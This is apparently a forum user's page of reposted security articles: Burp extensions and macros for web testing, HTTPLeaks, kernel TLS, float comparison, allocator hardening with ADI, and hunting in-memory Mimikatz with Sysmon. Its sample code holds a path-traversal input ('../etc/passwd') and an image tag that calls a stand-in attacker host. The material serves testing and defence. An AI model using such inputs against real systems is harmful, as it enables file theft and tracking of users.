Everything posted by Nytro

  1. Super POC: http://m.blog.csdn.net/caiqiiqi/article/details/77861477
  2. A lot of work has gone into the customer service & support side lately.
  3. If you connect with a German IP, there is probably no limit.
  4. HUNT Burp Suite Extension

     HUNT is a Burp Suite extension to:
       • Identify common parameters vulnerable to certain vulnerability classes.
       • Organize testing methodologies inside of Burp Suite.

     HUNT Scanner (hunt_scanner.py)
     This extension does not test these parameters, but rather alerts on them so that a bug hunter can test them manually (and thoroughly). For each class of vulnerability, Bugcrowd has identified common parameters or functions associated with that vulnerability class. We also provide curated resources in the issue description for thorough manual testing of these vulnerability classes.

     HUNT Methodology (hunt_methodology.py)
     This extension allows testers to send requests and responses to a Burp tab called "HUNT Methodology". This tab contains a tree on the left side that is a visual representation of your testing methodology. By sending requests/responses here, testers can organize their manual testing, or attest to having tested that section of the application or completed a certain methodology step.

     Getting Started with HUNT
     First, ensure you have the latest standalone Jython JAR set up under "Extender" -> "Options". Add HUNT via "Extender" -> "Extensions". HUNT Scanner will begin to run across traffic that flows through the proxy. It is important to note that HUNT Scanner leverages the passive scanning API. Passive scan checks are run on:
       • the first request of an active scan
       • proxy requests
       • any time "Do a passive scan" is selected from the context menu
     Passive scans are not run on:
       • active scan responses
       • Repeater responses
       • Intruder responses
       • Sequencer responses
       • Spider responses
     Instead, the standard workflow is to set your scope, run Burp Spider from the Target tab, then right-click "Passively scan selected items".

     HUNT Scanner Vulnerability Classes
       • SQL Injection
       • Local/Remote File Inclusion & Path Traversal
       • Server Side Request Forgery & Open Redirect
       • OS Command Injection
       • Insecure Direct Object Reference
       • Server Side Template Injection
       • Logic & Debug Parameters
       • Cross Site Scripting
       • External Entity Injection
       • Malicious File Upload

     TODO
       • Change the regex for parameter names to include user_id instead of just id
       • Search in the scanner window
       • Highlight the param in the scanner window
       • Implement script name checking, REST URL support, JSON & XML post-body params
       • Support the normal convention of the Request tab: Raw, Params, Headers, Hex sub-tabs inside the scanner
       • Add more methodology JSON files: Web Application Hacker's Handbook, PCI, HIPAA, CREST, OWASP Top Ten, OWASP Application Security Verification Standard, Penetration Testing Execution Standard, Burp Suite Methodology
       • Add more text for the advisory in the scanner window
       • Add more descriptions and resources in the methodology window
       • Add functionality to send request/response to other Burp tabs like Repeater

     Authors: JP Villanueva, Jason Haddix, Ryan Black, Fatih Egbatan, Vishal Shah
     License: Licensed under the Apache 2.0 License
     Source: https://github.com/bugcrowd/HUNT
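     The core idea of the scanner (flag requests whose parameter names commonly accompany a vulnerability class, without testing them) can be sketched outside Burp. This is a minimal standalone illustration, not HUNT's actual code; the class-to-parameter mapping below is a small invented sample, not HUNT's real data set.

     ```python
     # Standalone sketch of HUNT Scanner's core idea: flag parameter names
     # commonly associated with certain vulnerability classes. The mapping
     # below is a small illustrative sample, not HUNT's actual data set.
     from urllib.parse import urlparse, parse_qs

     HUNT_PARAMS = {
         "SQL Injection": {"id", "user_id", "query", "search"},
         "LFI / Path Traversal": {"file", "path", "template", "dir"},
         "SSRF / Open Redirect": {"url", "dest", "redirect", "callback"},
         "OS Command Injection": {"cmd", "exec", "ping", "daemon"},
     }

     def scan_url(url):
         """Return (vulnerability class, parameter) pairs worth manual testing."""
         params = parse_qs(urlparse(url).query)
         hits = []
         for vuln_class, names in HUNT_PARAMS.items():
             for p in params:
                 if p.lower() in names:
                     hits.append((vuln_class, p))
         return hits

     hits = scan_url("http://example.test/item?id=3&file=../etc/passwd")
     ```

     A real implementation would hook Burp's passive scanning API instead of parsing URLs directly, and would raise an informational issue per hit rather than return a list.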
  5. Dave Watson, Facebook, San Francisco, USA

     Abstract: Transport Layer Security (TLS) is a widely deployed protocol used for securing TCP connections on the Internet. TLS is also a required feature for HTTP/2, the latest web standard. In-kernel implementations provide new opportunities for optimization of TLS. This paper explores a possible kernel TLS implementation, as well as the kernel features it enables, such as sendfile(), BPF programs, and hardware TLS offload. Our implementation saves up to 7% of CPU copy overhead and improves latency by up to 10% when combined with the Kernel Connection Multiplexor (KCM).

     Download: https://netdevconf.org/1.2/papers/ktls.pdf
  6. Comparing Floating Point Numbers in C/C++

     Published September 2nd, 2017, by Elliot Chance

     Comparing floating point numbers for equality can be problematic. It's difficult because often we are comparing small or large numbers that are not represented exactly. There are also issues with rounding errors caused by not being able to represent an exact value. Rather than doing a strict value comparison (==), we treat two values as equal if their values are very close to each other.

     So what does "very close" mean? To answer that we have to look at how the numbers are represented in memory. (The original article shows the bit layouts of a 32-bit single-precision float and a 64-bit double-precision float here.) The number of bits in the fraction can be thought of as the number of significant bits (i.e. the accuracy) of the number. We do not want to use all of the fraction bits, otherwise we would be doing a strict comparison, but we will use most of them. For both float sizes I will use 4 fewer significant bits:

     #define INT64 52 - 4
     #define INT32 23 - 4

     We will use this to calculate the epsilon (the small difference that is still considered equal). However, we have to be careful that the number of bits we use to calculate the epsilon is based on the smallest-precision value in the comparison. For example, if we compare a 32-bit float with a 64-bit float, we must use only the precision of the 32-bit float. For this we can use a macro:

     #define approx(actual, expected) approxf(actual, expected, \
         sizeof(actual) != sizeof(expected) ? INT32 : INT64)

     There are two more gotchas:
       • Zero is a special case, because the epsilon would also be zero, causing an exact comparison. So we need to treat this as a separate case.
       • Non-finite values, such as NaNs and infinities, are never equal to each other in any combination. If either side is non-finite, the comparison is never equal.

     static int approxf(double actual, double expected, int bits)
     {
         // We do not handle infinities or NaN.
         if (isinf(actual) || isinf(expected) ||
             isnan(actual) || isnan(expected)) {
             return 0;
         }

         // If we expect zero (a common case) we use a fixed epsilon for actual.
         // If allowed to continue, the epsilon calculated would be zero and we
         // would be doing an exact match, which is what we want to avoid.
         if (expected == 0.0) {
             return fabs(actual) < (1 / pow(2, bits));
         }

         // The epsilon is calculated based on the significant bits of the
         // expected value. The number of bits used depends on the original size
         // of the float (in terms of bits), minus a few to allow for very
         // slight rounding errors.
         double epsilon = fabs(expected / pow(2, bits));

         // The numbers are considered equal if the absolute difference between
         // them is less than the relative epsilon.
         return fabs(actual - expected) <= epsilon;
     }

     You can find the full commented solution as part of the test suite in the c2go project. Thank you for reading. I'd really appreciate any and all feedback; please leave your comments below or consider subscribing. Happy coding.

     Source: https://elliot.land/post/comparing-floating-point-numbers-in-c-c
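     To experiment with the algorithm interactively, here is a direct Python transliteration of the article's approxf() logic (a sketch for exploration, not the author's code; the bit counts mirror the C macros):

     ```python
     import math

     # Python transliteration of the article's approxf(); the bit counts
     # mirror the C macros (52 - 4 for doubles, 23 - 4 for single precision).
     BITS64 = 52 - 4
     BITS32 = 23 - 4

     def approxf(actual, expected, bits=BITS64):
         # Infinities and NaNs are never considered equal to anything.
         if math.isinf(actual) or math.isinf(expected) \
                 or math.isnan(actual) or math.isnan(expected):
             return False
         # Zero needs a fixed epsilon: a relative one would be zero and
         # force an exact comparison, which is what we are trying to avoid.
         if expected == 0.0:
             return abs(actual) < 1 / 2 ** bits
         # Relative epsilon based on the significant bits of the expected value.
         epsilon = abs(expected / 2 ** bits)
         return abs(actual - expected) <= epsilon
     ```

     For example, approxf(0.1 + 0.2, 0.3) is True even though 0.1 + 0.2 == 0.3 is False in IEEE 754 arithmetic.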
  7. Black Hat, published Aug 31, 2017

     A processor is not a trusted black box for running code; on the contrary, modern x86 chips are packed full of secret instructions and hardware bugs. In this talk, we'll demonstrate how page fault analysis and some creative processor fuzzing can be used to exhaustively search the x86 instruction set and uncover the secrets buried in your chipset.

     Full abstract: https://www.blackhat.com/us-17/briefi...
     Download PDF: https://www.blackhat.com/docs/us-17/thursday/us-17-Domas-Breaking-The-x86-Instruction-Set-wp.pdf
  8. HTTPLeaks
    What is this?
    This project aims to enumerate all possible ways a website can leak HTTP requests, in one single HTML file. See the file leak.html (raw text version) in the root of this repository.

    What is it for?
    You can use this to test your browser for CSP leaks, your web-mailer for HTTP leaks, and everything else that is not supposed to send HTTP requests where the sun won't shine. With "HTTP leak", we are essentially referring to a situation where a certain combination of HTML elements and attributes causes a request to an external resource to be fired when it should not. Think, for example, of the body of an HTML mail, where an HTTP leak would tell someone out there that you just read that mail. Not always bad, but almost never good. Or think about web proxies. Those tools try to show you a website from a different domain to offer what they call "anonymity". Of course, they also have to rewrite all HTML elements and attributes that fetch resources via HTTP (or alike), and if they forget something, the so-called "anonymity" is gone. And, since no one really knows anymore which elements and attributes can request external resources, we decided to create this project to keep track of that.

    And now?
    The HTML will be extended as soon as we learn about a new leak; pull requests with additional exotic sources for HTTP leaks are very welcome! Also welcome are ideas on how else this content could be presented (JSON, HTML, XML, ...).

    Acknowledgements
    Thanks @hasegawayosuke, @masa141421356, @mramydnei, @avlidienbrunn, @orenhafif, @freddyb, @tehjh, @webtonull, @intchloe, @Boldewyn and many others for adding content and smaller fixes here and there!

    Source: https://github.com/cure53/HTTPLeaks
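    The rewriting problem the project illustrates (a proxy or mail client must catch every URL-bearing attribute or the "anonymity" is gone) can be sketched with a toy checker. This is only an illustration: the attribute list below is a tiny sample, while leak.html enumerates far more exotic vectors, and a regex is nowhere near sufficient for real HTML.

    ```python
    import re

    # Toy sketch of the problem HTTPLeaks demonstrates: find HTML attributes
    # that can trigger outbound HTTP requests. The attribute list is a small
    # sample; leak.html enumerates far more exotic vectors, and real HTML
    # needs a proper parser, not a regex.
    LEAKY_ATTRS = ("src", "href", "action", "poster", "data", "formaction")

    ATTR_RE = re.compile(
        r"\b(" + "|".join(LEAKY_ATTRS) + r")\s*=\s*[\"']?(https?://[^\"'\s>]+)",
        re.IGNORECASE)

    def find_leaks(html):
        """Return (attribute, url) pairs that would fire external requests."""
        return [(m.group(1).lower(), m.group(2)) for m in ATTR_RE.finditer(html)]

    leaks = find_leaks('<img src="http://evil.example/p.gif"><a href="#local">x</a>')
    ```

    Only the img src is flagged here; the fragment-only href fires no external request.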
  9. Automating Web App Input Fuzzing via Burp Macros

     Posted on September 3, 2017 by Samrat Das

     Hi readers, this article is about Burp Suite macros, which help us automate the effort of manual input payload fuzzing. While this may be known to many testers, it is written for those who have yet to harness the power of Burp Suite's macro automation.

     In my penetration testing career so far, while fuzzing parameters and page fields in web applications, I have encountered some challenges relating to session handling. In multiple cases the application would terminate the session being used for testing, either because of a security countermeasure (for example, logging the session out on unsafe input) or because the Burp spider/crawler fuzzed the logout page parameters and terminated the session. In such cases, further scans, probes and requests become unproductive, since you have to log in again and re-establish the session. I used to do this manually, and it was a bit cumbersome.

     While trying to find a workaround, I was going through Burp Suite's functions and noticed its session handling functionality. After probing the options, backed by some online research, I found that Burp takes care of the above challenges with rule-based macros. In simple words: if fuzzing parameters leads to session termination, Burp can automatically log back into the app with the credentials and continue scanning and crawling by itself.

     Things needed:
       1. Burp's free version (I used 1.7.21 free)
       2. Any website which has session handling (I am demonstrating with the classic demo.testfire.net)

     Step 1: This is the website I am using, which has a login feature. [Figure: vulnerable website]
     Step 2: At this point, I simply keep interception off in Burp Suite and enter the credentials to perform a login. [Figure: login page]
     Step 3: Here we enter the logged-in page of the website. [Figure: login field values]
     Step 4: To test the session handling, we send this page request to Burp's Repeater tab and, by removing the cookies, check whether the session is terminated. [Figure: request in Repeater]
     Step 5: We can see that the page is working since we have a proper session. Let's remove the cookies and test again. [Figure: Repeater tab]
     Step 6: As we can see, the session gets logged out, and we would need to log in again to continue testing. [Figure: session terminated]
     Step 7: Now Burp macros come to the rescue. Navigate to: Project Options -> Sessions -> Session Handling Rules. [Figure: setting up the macro]
     Step 8: Here we can see there is a default rule: "Use cookies from Burp's cookie jar". [Figure: Burp cookie jar]
     Step 9: Click the Add button to create a new rule. [Figure: adding a rule for the macro]
     Step 10: Enter a rule description that suits you and, under rule actions, select "Check session is valid". [Figure: setting the rule description]
     Step 11: Once you click OK, the session handling editor will fire up, showing the default "Issue current request". Leave it as is and scroll down to "If session is invalid, perform the following action". [Figures: rule configuration]
     Step 12: Tick "If session is invalid" and click "Add macro". At this point you will get a Macro Recorder holding all the proxy history. Click and select the page which has the login credentials and performs the login, then click OK.
     Step 13: Once you click OK, the Macro Editor will fire up. You can give the macro a custom name, and you also have options to simulate, re-record and re-analyze it. [Figure: Macro Recorder]
     Step 14: Before running a test, configure the parameters to verify that Burp has captured the test parameters correctly. [Figure: Macro Recorder parameter check]
     Step 15: Since everything is set, we can perform a test run of the macro after clicking OK.
     Step 16: Now click through to the final scope and set the URL scope (all URLs / suite scope / custom scope) to tell the macro where to run.
     Step 17: I leave it at "include all URLs" here. Let's now head over to Repeater again to test our macro. [Figure: scope setting for the macro]
     Step 18: Take a look: we try to access the main page without cookies in the Repeater tab. [Figure: tampering with the cookie value]
     Step 19: Once we hit Go, the cookies automatically get added to the request and the page loads! [Figures: macro executed with cookie added]

     So that's it. It's a sweet and simple way to show how Burp is useful for creating session-based rules and macros. We can simply fuzz the input fields with our test payloads to check for vulnerabilities such as XSS, SQLi, IDOR, etc. Even if the application times out due to inactivity, or protects the session against junk inputs during automated scanning or manual testing, such macros will execute the recorded action and log you back into the app! You can explore further with the cookie jar, Burp Extender and lots of other options. Happy experimenting!

     Source: http://blog.securelayer7.net/automating-web-apps-input-fuzzing-via-burp-macros/
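     The rule configured above boils down to a simple loop: before each request, check whether the session is still valid and, if not, replay the recorded login to refresh the cookie. The sketch below simulates that loop in plain Python; FakeApp, the credentials and the cookie names are all hypothetical stand-ins, not Burp internals.

     ```python
     # Plain-Python sketch of what the session-handling rule automates: check
     # the session before a request and, if it is invalid, run the recorded
     # login macro and retry. FakeApp and the credentials are hypothetical
     # stand-ins for the real application, not Burp internals.
     class FakeApp:
         """Minimal stand-in for a web app that can invalidate sessions."""
         def __init__(self):
             self.valid_cookies = set()

         def login(self, user, password):
             cookie = f"session-for-{user}"
             self.valid_cookies.add(cookie)
             return cookie

         def get(self, cookie):
             return "Welcome" if cookie in self.valid_cookies else "Login required"

     def request_with_macro(app, state):
         """Issue a request; on an invalid session, run the login macro and retry."""
         page = app.get(state.get("cookie"))
         if "Login required" in page:                        # "check session is valid"
             state["cookie"] = app.login("jsmith", "demo1234")  # recorded login macro
             page = app.get(state["cookie"])
         return page

     app, state = FakeApp(), {}
     page = request_with_macro(app, state)   # first call triggers the login macro
     ```

     Even if the app later invalidates the cookie, the next request_with_macro call recovers automatically, which is exactly the behavior the Burp rule gives you during scanning.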
  10. Thursday, December 22, 2016

      Hardening Allocators with ADI

      Memory allocators play a crucial role in any modern application/operating system: satisfying arbitrary-sized dynamic memory requests. Errors by the consumer in handling such buffers can lead to a variety of vulnerabilities, which have been regularly exploited by attackers over the past 15 years. In this blog entry, we'll look at how the ADI (Application Data Integrity) feature of the new Oracle M7 SPARC processors can help harden allocators against most of these attacks.

      A quick memory allocator primer

      Writing memory allocators is a challenging task. An allocator must be performant, limit fragmentation to a bare minimum, scale up to multi-threaded applications, and efficiently handle both small and large allocations and frequent/infrequent alloc/free cycles. Looking in depth at allocator designs is beyond the scope of this blog entry, so we'll focus here only on the features that are relevant from an exploitation (and defense) perspective.

      Modern operating systems deal with memory in page-sized chunks (ranging from 8K up to 16G on M7). Imagine an application that needs to store a 10-character string: handing out an 8K page is certainly doable, but is hardly an efficient way to satisfy the request. Memory allocators solve the problem by sitting between the OS physical page allocator and the consumer (be it the kernel itself or an application) and efficiently managing arbitrary-sized allocations, dividing pages into smaller chunks when small buffers are needed.

      Allocators are composed of three main entities:
        • live buffers: chunks of memory that have been assigned to the application and are guaranteed to hold at least the number of bytes requested.
        • free buffers: chunks of memory that the allocator can use to satisfy an application request. Depending on the allocator design, these are either fixed-size buffers or buffers that can be sliced into smaller portions.
        • metadata: all the necessary information that the allocator must maintain in order to work efficiently. Again, depending on the allocator design, this information might be stored within the buffer itself (e.g. Oracle Solaris libc malloc stores most of the data along with the buffer) or separately (e.g. the Oracle Solaris umem/kmem SLAB allocator keeps the majority of the metadata in dedicated structures placed outside the objects).

      Since allocators divide a page into either fixed-size or arbitrary-size buffers, it's easy to see that, due to the natural flow of alloc/free requests, live buffers and free buffers end up living side by side in the linear memory space. The period from when a buffer is handed out to an application up until it is freed is generally referred to as the buffer lifetime. During this period, the application has full control of the buffer contents. After this period, the allocator regains control and the application is expected not to interfere.

      Of course, bugs happen. Bugs can affect both the application's working set of buffers and the allocator's free set and metadata. If we exclude allocator intrinsic design errors (which, for long-existing allocators, due to the amount of exercise they get, are basically zero), bugs always originate from the application mishandling a buffer reference, so they always happen during the lifetime of a buffer and originate from a live buffer. It's no surprise that live buffer behavior is what both attackers and defenders start from.

      Exploitation vectors and techniques

      As we said, bugs originate from the application mishandling allocated buffers:
        • mishandling of buffer size: the classic case of buffer overflow. The application writes past the buffer boundaries into adjacent memory. Because buffers are intermixed with other live buffers, free buffers and, potentially, metadata, each one of those entities becomes a potential target, and attackers will go for the most reliable one.
        • mishandling of buffer references: a buffer is relinquished back to the allocator, but the attacker still holds a reference to it. Traditionally, these attacks are known as use-after-free (UAF), although, since this is an industry that loves taxonomies, it's not uncommon to see them further qualified as use-after-realloc (the buffer is reallocated, but the attacker is capable of unexpectedly modifying it through the stale reference) and double free (the same reference is passed twice to the free path). Sometimes an attacker is also capable of constructing a fake object and passing it to a free call, for example if the application erroneously calls free on a buffer allocated on the stack.

      The degree of exploitability of these vulnerabilities (if we exclude the use-after-realloc case, which is application-specific) varies depending on what the allocator does during the free path and how many consistency/hardening checks are present. With the notable exceptions of double free and "vanilla" use-after-free, both of the above classes are extremely hard to detect at runtime from an allocator perspective, as they originate (and potentially inflict all the necessary damage) during the object lifetime, when the allocator has little to no practical control over the buffer. For this reason, the defense focus has been on the next best thing when bug classes cannot be eradicated: hampering/mitigating exploitation techniques. Over the years (and to various degrees in different allocators), this has taken the form of:
        • entrypoint checks: add consistency checks at the defined free and alloc entrypoints. As an example, an allocator could mark in the buffer's associated metadata (or by poisoning the buffer itself) that the buffer has been freed. It would then be able to check this information whenever the free path is entered, and a double free could be easily detected.
      Many of the early-day techniques to exploit heap overflows (~2000: w00w00, PHRACK 57 MaXX's and anonymous' articles) relied on modifying metadata that would then be leveraged during the free path. Over time, some allocators have added checks to detect some of those techniques.
        • design mitigations: attackers crave control of the heap layout: in what sequence buffers are allocated, where they are placed, how a buffer containing sensitive data can be conveniently allocated in a specific location. Allocators can introduce statistical mitigations to hamper some of the techniques used to achieve this level of control. As an example, free object selection can be randomized (although this ends up being pretty ineffective against a variety of heap spraying techniques and/or if the attacker has significant control over the allocation pattern), free patterns can be modified (Microsoft IE Memory Protector), or sensitive objects can be allocated from a different heap space (dedicated SLAB caches, Windows IE Isolated Heap, Chrome PartitionAlloc, etc.).

      The bottom-line goal of these (and other) design approaches is to either reduce the predictability of the allocator or increase the amount of precise control the attacker needs in order to create the heap layout conditions to successfully exploit the bug. Of course, more invasive defenses also exist, but they hardly qualify for large-scale deployment, as users tend to (rightfully) be pretty concerned about the performance of their applications/operating systems. This becomes even more evident when we compare the defenses enabled and deployed today at kernel level versus those enabled at user level (and in browsers): different components have different (and varying) performance requirements.
      The practical result is that slab overflows are today probably the most reliable type of vulnerability at kernel level, with use-after-free a close second in kernel land, while the latter are extensively targeted in user land, with only the browsers being significantly more hardened than other components. Extensive work is going on towards automating and abstracting the development of exploits for such bugs (as recently presented by argp at Zeronights), which makes the design of efficient defenses even more compelling.

      ADI to the rescue

      Enter the Oracle SPARC M7 processor and ADI, Application Data Integrity, both unveiled at Hot Chips and Oracle OpenWorld 2014. At its core, ADI provides memory tagging. Whenever ADI is enabled on a page entry, dedicated non-privileged load/store instructions provide the ability to assign a 4-bit version to each 64-byte cache line that is part of the page. This version is maintained by the hardware throughout the entire non-persistent memory hierarchy (basically, all the way down to DRAM and back). The same version can then be mirrored onto the (previously) unused 4 topmost bits of each virtual address. Once this is done, each time a pointer is used to access a memory range, if ADI is enabled (both at the page and per-thread level), the tag stored in the pointer is checked by the hardware against the tag stored in the cache line. If the two match, all is peachy. If they don't, an exception is raised. Since the check is done in hardware, the main burden is at buffer creation rather than at each access, which means that ADI can be introduced in a memory allocator and its benefit extended to any application consuming it, without the need for extra instrumentation or special instructions in the application itself. This is a significant difference from other hardware-based memory corruption detection options, like Intel MPX, and minimizes the performance impact of ADI while maximizing coverage.
      More importantly, this means we finally have a reliable way to detect live object mishandling: the hardware does it for us. [Figure: ADI versioning at work; picture taken from the Oracle SPARC M7 presentation]

      4 bits allow for a handful of possible values. There are two intuitive ways in which an ADI-aware allocator can invariantly detect a linear overflow from a buffer/object into the adjacent one:
        • introduce a redzone with a special tag
        • tag any two adjacent buffers differently

      Introducing a redzone means wasting 64 bytes per allocation, since 64 bytes is the minimum granularity with ADI. Wasted memory scales up linearly with the number of allocations and might end up being a substantial amount. Also, the redzone entry must be 64-byte aligned as well, which practically translates into both the buffers and the redzone being 64-byte aligned. The advantage of this approach is that it is fairly simple to implement: simply round up every allocation to 64 bytes and add an extra complementary 64-byte buffer. For this reason, it can be a good candidate for debugging scenarios or for applications that are not particularly performance sensitive and need a simple allocation strategy. For allocators that store metadata within the buffer itself, this redzone space could be used to store the metadata information. Mileage again varies depending on how big the metadata is, and it's worth pointing out that general-purpose allocators usually strive to keep it small (e.g. Oracle Solaris libc uses 16 bytes for each allocated buffer) to reduce memory wastage.

      Tagging two adjacent objects differently, instead, has the advantage of reducing memory wastage. In fact, the only induced wastage comes from forcing the alignment to a 64-byte boundary. It requires, though, being able to uniquely pick a correct tag value at allocation time.
      Object-based allocators are a particularly good fit for this design because they already take some of the penalty for wasted memory (and larger caches are usually already 64-byte aligned), and their design (fixed-size caches divided into a constant number of fixed-size objects) allows objects to be uniquely identified based on their address. This provides the ability to alternate between two different values (or ranges of values, e.g. odd/even tags, or smaller/bigger than a median) based on the object position. For other allocators, the ability to properly tag the buffer depends on whether there is enough metadata to learn the previous and next object's tag. If there is, then this can still be implemented; if there isn't, one might decide to employ a statistical defense by randomizing the tag (note that the same point also applies to object-based allocators when we look at large caches, where effectively only a single object is present per cache).

      A third interesting property of tagging is that it can be used to uniquely identify classes of objects, for example free objects. As we discussed previously, metadata and free objects are never the affector, but only the affectee, of an attack, so one tag each suffices. The good side effect of devoting a tag to each is that the allocator now has a fairly performant way to identify them, and issues like double frees can be easily detected. In the same way, it's also automatically guaranteed that a live object will never be able to overflow into metadata or free objects, even if a statistical defense (e.g. tag randomization) is employed.

      Use-after-realloc and arbitrary writes

      ADI does one thing and does it great: it provides support to implement an invariant that detects linear overflows.
      Surely, this doesn't come without some constraints (64-byte granularity, 64-byte alignment, page-level granularity to enable it, 4-bit versioning range) and might be a more or less good fit (performance- and design-wise) for an existing allocator, but this doesn't detract from its security potential. Heartbleed is just one example of a linear out-of-bounds access, and SLAB/heap overflow fixes have been in the commit logs of all major operating systems for years now. Invariantly detecting them is a significant win.

      Use-after-realloc and arbitrary writes, instead, can't be invariantly stopped by ADI, although ADI can help mitigate them. As we discussed, use-after-realloc relies on the attacker's ability to hold a reference to a freed-and-then-reallocated object and then use this reference to modify some potentially sensitive content. ADI can introduce some statistical noise into this exploitation path, by looping/randomizing through different tag values for the same buffer/object. Note that this doesn't affect the invariant portion of, for example, alternate tagging in object-based allocators; it simply takes further advantage of the versioning space. Of course, if the attacker is in a position to perform a brute-force attack, this mitigation would not hold much ground, but in certain scenarios brute-forcing might be a limiting factor (kernel-level exploitation) or leave some detectable noise.

      Arbitrary writes, instead, depend on the attacker's ability to forge an address and are not strictly related to allocator ranges only. Since the focus here is the allocator, the most interesting variant is when the attacker has the ability to write to an arbitrary offset from the current buffer. If metadata and free objects are specially tagged, they are unreachable, but other live objects with the same tag might be reached. Just as in the use-after-realloc case, adding some randomization to the sequence of tags can help, with the very same limitations.
      In both cases, infoleaks would precisely guide the attacker, but this is basically a given for pretty much any statistical defense.

      TL;DR

      Oracle SPARC M7 processors come with ADI, Application Data Integrity, a feature that provides memory tagging. Memory allocators can take advantage of it both for debugging and for security, in order to invariantly detect linear buffer overflows and statistically mitigate use-after-free and offset-based arbitrary writes.

      Posted by lazytyped at 9:35 AM

      Source: https://lazytyped.blogspot.ro/2016/12/hardening-allocators-with-adi.html?m=1
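      The alternate-tagging scheme described above can be illustrated with a toy software model. This is only a simulation of the concept (64-byte lines, 4-bit versions, the tag mirrored into a pointer's top bits), not SPARC semantics or real instructions; the class and method names are invented for the sketch.

      ```python
      # Toy model of ADI-style memory tagging (an illustration, not SPARC
      # semantics): each 64-byte line carries a 4-bit version, every pointer
      # carries the same version in its top bits, and the "hardware" check
      # compares the two on every access.
      LINE = 64

      class AdiMemory:
          def __init__(self, size):
              self.tags = [0] * (size // LINE)

          def set_version(self, addr, length, tag):
              """Tag every line the buffer spans; return a tagged pointer."""
              for line in range(addr // LINE, (addr + length - 1) // LINE + 1):
                  self.tags[line] = tag
              return (tag << 60) | addr      # mirror the tag in the top bits

          def access(self, pointer, offset=0):
              """Simulated load/store: trap on a version mismatch."""
              tag = pointer >> 60
              addr = (pointer & ((1 << 60) - 1)) + offset
              if self.tags[addr // LINE] != tag:
                  raise MemoryError("ADI version mismatch")   # hardware trap

      mem = AdiMemory(4096)
      # Alternate tagging: adjacent 64-byte objects get different versions,
      # so a linear overflow out of object A trips on object B's first line.
      a = mem.set_version(0, 64, tag=5)
      b = mem.set_version(64, 64, tag=6)
      mem.access(a)            # in-bounds access: fine
      ```

      Accessing a at offset 64 (one byte past the object) carries tag 5 into a line tagged 6 and raises, which is the invariant linear-overflow detection the post describes.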
  11. Saturday, March 11, 2017

      Chronicles of a Threat Hunter: Hunting for In-Memory Mimikatz with Sysmon and ELK - Part I (Event ID 7)

      This post marks the beginning of the "Chronicles of a Threat Hunter" series, where I will be sharing my own research on how to develop hunting techniques. I will use open source tools and my own lab at home to test real-world attack scenarios. In this first post, I will show you the beginning of some research I have been doing recently with Sysmon in order to hunt for Mimikatz being reflectively loaded in memory. This technique is used to dump credentials without writing the Mimikatz binary to disk.

      Invoke-Mimikatz.ps1 author: Joe Bialek, Twitter: @JosephBialek
      Mimikatz author: Benjamin Delpy 'gentilkiwi', Twitter: @gentilkiwi

      This first part will cover how we could approach the detection of in-memory Mimikatz by focusing on the specific Windows DLLs that it needs to load in order to work (no matter what process it runs from, and whether or not it touches disk). I will compare the results when Mimikatz is run on disk and in memory to see the specific DLLs needed in both scenarios. There is an article that takes this same approach, but I feel that it could be improved upon. It is still a good read, and I love the approach. You can read it here.

      Requirements:
        • Sysmon installed (I have version 6 installed)
        • Winlogbeat forwarding logs to an ELK server (I recommend reading my series "Setting up a Pentesting.. I mean, a Threat Hunting Lab", especially parts 5 & 6, to help you set up your environment)
        • Mimikatz binary (version 2.1 20170305)
        • Invoke-Mimikatz
        • Notepad++ - a great local editor for your Sysmon configs

      Mimikatz Overview

      Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a proof of concept).
There are two optional components that provide additional features: mimidrv (a driver to interact with the Windows kernel) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM rights, and often debug rights, in order to perform certain actions and interact with the LSASS process (depending on the action requested) [Source].

Mimikatz comes in two flavors, x64 or Win32, depending on your Windows version (32/64 bit). The Win32 flavor cannot access 64-bit process memory (like lsass), but can open 32-bit minidumps under 64-bit Windows. Mimikatz is now well known for extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. It can also perform pass-the-hash and pass-the-ticket, and build Golden Tickets. [Source]

In-Memory Mimikatz

What gives Invoke-Mimikatz its "magic" is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory [Source]. However, it needs other native Windows DLLs already on disk in order to do its job.

Event ID 7: Image loaded

The image loaded event logs when a module is loaded in a specific process. This event is disabled by default and needs to be configured with the -l option. It indicates the process in which the module is loaded, plus hash and signature information. The signature is created asynchronously for performance reasons and indicates if the file was removed after loading. This event should be configured carefully, as monitoring all image load events will generate a large number of events. [Source]

Getting ready to hunt for Mimikatz

Getting a Sysmon Config ready

The main goal is to monitor for images loaded when Mimikatz gets executed. However, first we have to make sure that we understand what "normal" looks like. Therefore, the first thing I recommend doing is to monitor the images loaded by the process which will be executing Mimikatz in its two forms (the Mimikatz binary and Invoke-Mimikatz).
We will test Mimikatz on disk first. This first step of logging images loaded by the process executing Mimikatz will be more helpful when we test the Invoke-Mimikatz script, but it is a good exercise for you to understand the testing methodology. The process that I used for this first test was "PowerShell.exe", so I created a basic Sysmon configuration to only log images loaded by this process. It is available on GitHub (PowerShell_ImagesLoaded.xml) as shown below.

<Sysmon schemaversion="3.30">
  <!-- Capture all hashes -->
  <HashAlgorithms>md5</HashAlgorithms>
  <EventFiltering>
    <!-- Event ID 1 == Process Creation. -->
    <ProcessCreate onmatch="include"/>
    <!-- Event ID 2 == File Creation Time. -->
    <FileCreateTime onmatch="include"/>
    <!-- Event ID 3 == Network Connection. -->
    <NetworkConnect onmatch="include"/>
    <!-- Event ID 5 == Process Terminated. -->
    <ProcessTerminate onmatch="include"/>
    <!-- Event ID 6 == Driver Loaded. -->
    <DriverLoad onmatch="include"/>
    <!-- Event ID 7 == Image Loaded. -->
    <ImageLoad onmatch="include">
      <Image condition="end with">powershell.exe</Image>
    </ImageLoad>
    <!-- Event ID 8 == CreateRemoteThread. -->
    <CreateRemoteThread onmatch="include"/>
    <!-- Event ID 9 == RawAccessRead. -->
    <RawAccessRead onmatch="include"/>
    <!-- Event ID 10 == ProcessAccess. -->
    <ProcessAccess onmatch="include"/>
    <!-- Event ID 11 == FileCreate. -->
    <FileCreate onmatch="include"/>
    <!-- Event ID 12,13,14 == RegObject added/deleted, RegValue Set, RegObject Renamed. -->
    <RegistryEvent onmatch="include"/>
    <!-- Event ID 15 == FileStream Created. -->
    <FileCreateStreamHash onmatch="include"/>
    <!-- Event ID 17 == PipeEvent. -->
    <PipeEvent onmatch="include"/>
  </EventFiltering>
</Sysmon>

